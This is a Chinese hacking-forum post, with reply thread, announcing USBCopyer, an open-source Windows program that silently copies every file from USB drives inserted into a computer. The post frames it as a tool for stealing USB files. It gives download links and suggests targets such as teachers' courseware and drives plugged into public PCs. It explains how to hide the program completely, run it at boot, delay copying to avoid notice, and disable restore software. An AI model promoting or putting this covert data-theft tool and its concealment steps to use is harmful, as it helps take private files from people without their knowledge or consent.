吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[原创工具] 【开源】可能是最好用的偷U盘文件的神器!USBCopyer—插上U盘后自动复制U盘文件 v3.7

无名智者 发表于 2017-4-22 15:22

USBCopyer: 插上U盘自动复制U盘文件

用于在插上目标U盘后自动复制该U盘的文件。"偷U盘文件的神器"
支持设置冲突解决方案,支持延迟复制,支持扩展名黑白名单,支持磁盘分区号/序列号黑名单,支持日志,支持弹出U盘时强制停止复制防止占用,支持文件大小限制
本程序有两个图标,默认图标表示当前处于空闲状态,红色图标表示当前正在复制文件(工作中)
现已提供三个版本(标准版/兼容版/低权限版)可供下载,见“已编译版本下载”节

screenshot - 副本.jpg

构建状态:

已编译版本下载
【推荐】.Net Framework 4.0 版本(标准版)       
适用操作系统:Windows 8 / Windows 10
点击从Git@OSC下载:https://git.oschina.net/kenvix/USBCopyer/raw/master/Release/USBCopyer.Release.exe
点击从GitHub下载:https://github.com/kenvix/USBCopyer/blob/master/Release/USBCopyer.Release.exe?raw=true

.Net Framework 3.5 版本(兼容版)   
适用操作系统:Windows 7 / Windows Vista / Windows XP
WinXP请注意:XP可能需要安装手动.NET Framework 3.5,[没有安装请点此]
点击从Git@OSC下载:https://git.oschina.net/kenvix/USBCopyer/raw/master/Release/USBCopyer.Release.Net3.5.exe
点击从GitHub下载:https://github.com/kenvix/USBCopyer/blob/master/Release/USBCopyer.Release.Net3.5.exe?raw=true

低权限 .Net Framework 4.0 版本(低权限版)   
适用操作系统:Windows 8 / Windows 10
适用情况:不便于关闭UAC的操作系统,这类系统使用在标准版USBCopyer时,会提示请求管理员权限。低权限版通过降低自身的访问权限来规避此问题。
注意:要设置开机启动,你必须以管理员权限来运行低权限版。低权限版可能无法复制有权限设置的文件的U盘
点击从Git@OSC下载:https://git.oschina.net/kenvix/USBCopyer/raw/master/Release/USBCopyer.Release.Low-Permissions.exe
点击从GitHub下载:https://github.com/kenvix/USBCopyer/blob/master/Release/USBCopyer.Release.Low-Permissions.exe?raw=true

适用场景
1.获取授课教师的课件
2.获取插到某台公用电脑上的U盘的数据
3.(并非本程序的设计用途)备份U盘

如何使用
1.下载
2.双击 USBCopyer.exe
3.程序将在托盘区运行,右击图标可以调整其参数
点击 "隐藏图标" 将彻底隐藏程序,只能使用任务管理器停止,或按Win+R输入taskkill /f /im USBCopyer.exe
点击 "设置" 可以设置程序

命令行
USBCopyer.exe [/hide]
/hide 以隐藏模式启动,只能通过任务管理器结束进程

常见问题
USBCopyer的复制行为造成U盘的文件操作卡顿
请设置一个延迟。通常推荐在使用者开始放映幻灯片时开始复制
使用者在使用该电脑前重启了此电脑
将本程序设为开机启动即可。设置方法如下:
1. 直接在本程序的“设置”中设置
2. 若上面的方法无效,则可:
创建一个快捷方式,然后加上参数,拖到 "开始菜单" 的 "启动" 文件夹即可
可否复制手机的文件?
若为MTP/PTP则无法实现,但如果是以Mass Storage(大容量存储)模式挂载到电脑上的设备则可以复制
U盘在操作完成前被拔出
无解
目标电脑带有还原机制
两种方法:
1.插上你的U盘,然后启动本程序,加入该U盘到黑名单,然后设置输出目录到你的U盘
2.用 PCHunter 之类的程序干掉还原程序

代码仓库
Git@OSChttps://git.oschina.net/kenvix/USBCopyer
GitHubhttps://github.com/kenvix/USBCopyer

捐赠
USBCopyer 是一个开源的,非盈利的项目。如果你喜欢这个项目,请捐赠它:
捐赠方法:右击图标->设置->点击右下角的Logo

更新日志:下一页

之前看到过一次,不过那个帖子被屏蔽了,你们莫非同一个人~  发表于 2017-4-22 15:45

免费评分

随意点 + 1 + 1 谢谢@Thanks!
向前向厚 + 1 鼓励转贴优秀软件安全工具和文档!
azsxdcewq1 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
陈独秀同志 + 1 + 1 我很赞同!
17313chao + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
庄周梦蝶 + 1 + 1 谢谢@Thanks!
长风当歌 + 1 + 1 我很赞同!
phdsx + 1 + 1 我很赞同!
jnez112358 + 1 谢谢@Thanks!
枕荷听雨 + 1 + 1 热心回复!
十点睡先生 + 1 谢谢@Thanks!
我是一枚小小白 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
errir911 + 1 + 1 我很赞同!
xixw + 1 + 1 谢谢@Thanks!
蓝天下的阳光 + 1 + 1 鼓厉
leekexp + 1 谢谢@Thanks!
jimchan + 1 + 1 谢谢@Thanks!
毁灭空间 + 1 + 1 谢谢@Thanks!
lzz656 + 1 + 1 谢谢@Thanks!
Kevin4267 + 1 + 1 谢谢@Thanks!
zhouaga + 1 + 1 我很赞同!
小茗科技 + 1 我很赞同!
dffirea + 1 + 1 我很赞同!
amoxuan + 1 + 1 热心回复!
tao123 + 1 谢谢@Thanks!
徐思谦 + 1 + 1 谢谢@Thanks!
节能降耗 + 1 + 1 我很赞同!
FreeCG + 1 + 1 这个牛了,点个赞
garrison_luo + 1 + 1 已答复!
你比我先挂 + 1 + 1 我很赞同!
sadiuy + 1 + 1 已答复!
hanchuangof + 1 + 1 我很赞同!
庞清源 + 1 + 1 已答复!
guyue25s2 + 1 + 1 谢谢@Thanks!
小冬 + 1 + 1 我很赞同!
ken1994 + 1 + 1 热心回复!
汪生 + 1 + 1 谢谢@Thanks!
wstianfeng + 1 + 1 谢谢@Thanks!
傻傻分不清 + 1 + 1 谢谢@Thanks!
fox_203 + 1 + 1 谢谢@Thanks!
550729 + 1 + 1 我很赞同!
常育水 + 1 谢谢@Thanks!
Dracula-X + 1 + 1 我很赞同!
Boss_Lee + 1 谢谢@Thanks!
HsiYing + 1 + 1 已答复!
鬼神泣血 + 1 + 1 谢谢@Thanks!
ivanimba + 1 我很赞同!
s441421 + 1 + 1 已收藏,楼主is real 机智
抱书人人 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
难道 + 1 + 1 谢谢@Thanks!
ghost286 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Hunterwty + 1 + 1 热心回复!
chaohua27 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
cs001 + 2 + 1 谢谢@Thanks!
martinnly + 1 + 1 我很赞同!
蓝皮鼠 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
ef9494 + 1 + 1 谢谢@Thanks!
liujing521 + 1 + 1 我很赞同!
kylinpapa + 1 + 1 我很赞同!
xtwwx110 + 1 + 1 谢谢@Thanks!
旺仔狂 + 1 + 1 我很赞同!
zhcj66 + 1 + 1 谢谢@Thanks!
x641021729 + 1 + 1 原谅我之前年少无知的评论,真是最好用的
freedoom + 1 + 1 我很赞同!
keyshot3 + 1 + 1 复制到病毒怎么办。。。。
Martin.Zhou + 1 + 1 已答复!
axinrain + 1 谢谢@Thanks!
windy8848 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
magus + 1 + 1 我很赞同!
唯有努力 + 1 + 1 谢谢@Thanks!
bcbcvbvn66 + 1 + 1 谢谢@Thanks!
jeehom + 1 + 1 谢谢@Thanks!
kk老关 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
胡子大叔 + 1 + 1 谢谢@Thanks!
指导员 + 1 + 1 用心讨论,共获提升!
tedlee + 1 + 1 谢谢@Thanks!
coffee0818 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
不贰 + 1 + 1 谢谢@Thanks!
吾爱狂魔 + 1 + 1 已答复!
suxiaoxiann + 1 + 1 谢谢@Thanks!
幸福感 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
yuhu521 + 2 + 1 我很赞同!
suifengdang666 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
ryuyishi + 1 + 1 用心讨论,共获提升!
qwe159 + 1 谢谢@Thanks!
ly04031855 + 1 热心回复!
dengsha + 1 + 1 我很赞同!
我假装是个过客 + 1 + 1 我很赞同!
lqyygyie + 1 + 1 我很赞同!
52pjie25 + 1 + 1 我很赞同!
子十一 + 1 + 1 我很赞同!
xiaogg + 1 + 1 谢谢@Thanks!
马丁路德银 + 1 + 1 谢谢@Thanks!
Zefir + 1 + 1 用心讨论,共获提升!
douzi118 + 1 我很赞同!
thxz50 + 1 + 1
step5783 + 1 + 1 已答复!
szm + 1 + 1 我很赞同!
nadesico88 + 1 + 1 我很赞同!
快上车 + 1 谢谢@Thanks!

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

God凉 发表于 2017-5-16 12:49 来自手机
不回帖, 后来我发现, 这样不但会花掉我的金币, 而且不厚道。 于是我把这段文字保存在记事本里, 每看一个帖子, 就复制上去, 以表达我对楼主的谢意, 把帖子顶起来, 顺便帮自己挣点金钱 其实我说的都是实话, 但是楼主辛苦做的东西, 我不忍心轻易拿走, 必须留言,楼主辛苦来自: Android客户端来自: 支持Android客户端

免费评分

ufolshb -1 请勿灌水,提高回帖质量是每位会员应尽的义务!
mengzhenhai -15 请勿灌水,提高回帖质量是每位会员应尽的义务!

piepie 发表于 2017-7-22 12:28 来自手机
Allen4168 发表于 2017-6-14 16:33
疏影闪现 发表于 2017-10-15 15:20
感谢您的分享!!!!!!!
jnez112358 发表于 2017-10-15 13:22
这个也不错呀,另类,有用
头像被屏蔽
love看看020 发表于 2017-10-15 12:37
忘情的城市 发表于 2017-10-15 12:28
这个,NET 几个是啥意思
lovFlov 发表于 2017-10-13 15:20
以前收藏过一个,不知道是不是同一版本……
xingr9611 发表于 2017-10-13 15:10
试卷流出~~~~~
zsy 发表于 2017-10-13 14:56
不错不错,感谢分享!
nsoshhy 发表于 2017-10-13 13:12
不知道复制的速度如何?是U盘决定的吗?
sjrw 发表于 2017-10-13 12:57
这个东西好啊